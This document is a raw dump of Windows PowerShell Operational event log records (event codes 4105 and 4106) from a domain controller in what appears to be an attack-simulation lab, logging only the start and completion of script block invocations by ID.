SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469582
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469581
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469580
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469579
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469578
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469577
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469576
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469575
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469574
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469573
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469572
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469571
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469570
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469569
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469568
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469567
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469566
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469565
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469564
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469563
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469562
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469561
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469560
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469559
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469558
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469557
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469556
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469555
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469554
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469553
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469552
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469551
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469550
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469549
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469548
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469547
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469546
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469545
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469544
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469543
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469542
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469541
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469540
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469539
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469538
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469537
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469536
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469535
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469534
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469533
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469532
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469531
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469530
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469529
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469528
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469527
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
